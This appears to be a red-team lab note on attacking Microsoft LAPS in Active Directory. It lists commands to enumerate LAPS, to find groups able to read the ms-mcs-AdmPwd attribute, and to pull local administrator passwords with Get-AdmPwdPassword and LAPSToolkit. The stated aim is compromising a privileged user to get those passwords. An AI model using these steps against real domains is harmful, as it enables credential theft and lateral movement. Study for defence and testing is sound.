LAPS

In 2015, Microsoft removed storing the Encrypted Password in the SYSVOL Folder. It introduced the Local Administrator Password Solution (LAPS), which offers a much more secure approach to remotely managing the Local Administrator Password.

The new method includes Two New Attributes [ms-mcs-AdmPwd - ms-mcs-AdmPwdExpirationTime] of Computer Objects in the Active Directory.

The ms-mcs-AdmPwd Attribute contains a Clear-Text Password of the Local Administrator. The ms-mcs-AdmPwdExpirationTime contains the Expiration Time to reset the Password. LAPS uses admpwd.dll to change the Local Administrator Password and Update the value of ms-mcs-AdmPwd.

Enumerating LAPS

First we check if LAPS is Installed in the Target Machine, which can be done by checking the admpwd.dll Path.

LAPS

:: The File [AdmPwd.dll] Should be Present
dir "C:\Program Files\LAPS\CSE"

:: Check the available Commands to use for AdmPwd cmdlets
Get-Command *AdmPwd*

Output

Directory of C:\Program Files\LAPS\CSE
06/06/2022  01:01 PM              .
06/06/2022  01:01 PM              ..
05/05/2021  07:04 AM           184,232 AdmPwd.dll

Now we need to find which AD Organizational Unit (OU) has the All Extended Rights Attribute that deals with LAPS. We can use the Find-AdmPwdExtendedRights cmdlet to provide the right OU.

Find-AdmPwdExtendedRights

# List all Available Organizational Units
Find-AdmPwdExtendedRights -Identity *

Output

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=ADOBEOrg,DC=thm,DC=red                     {ADOBE\GroupName}

After we find the Organizational Unit with the All Extended Rights Attribute we can examine that Group and its Members. The End-Goal is to Compromise a User with Administrative Privileges to get the LAPS Password.

:: Group Information
net groups "Group Name"

:: User Information [Found from the Command Above]
net user "Username"

Getting the Password

After finding the right User and Compromising him, we can get the LAPS Password using Get-AdmPwdPassword cmdlet by providing the Target Machine with LAPS Enabled.

Get-AdmPwdPassword

Get-AdmPwdPassword -ComputerName *

Output

ComputerName     DistinguishedName                         Password     ExpirationTimestamp
------------     -----------------                         --------     -------------------
PC-GREEN         CN=PC-GREEN,OU=ADOBEOrg,DC=thm,DC=red     Password     2/11/2338 11:05:2...

Other

Info

In Active Directory Environments, the LAPS is Enabled on specific Machines Only. Thus, we need to Enumerate and find the right Target Computer as well as the right User Account to be able to get the LAPS Password.

One of the Scripts to help with the Enumeration Task is LAPSToolkit as it Leverages the PowerView to Audit and Attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS).

LAPSToolkit

Get-LAPSComputers

# Displays all Computers with LAPS Enabled, Password Expiration, and Password if User has Access
Get-LAPSComputers

Find-LAPSDelegatedGroups

# Searches Through all OU's to see which AD Groups can Read the [ms-Mcs-AdmPwd] Attribute
Find-LAPSDelegatedGroups

Find-AdmPwdExtendedRights

# Parses through ExtendedRights for each AD Computer with LAPS Enabled and looks for which Group has Read Access and if any User has [All Extended Rights] 
Find-AdmPwdExtendedRights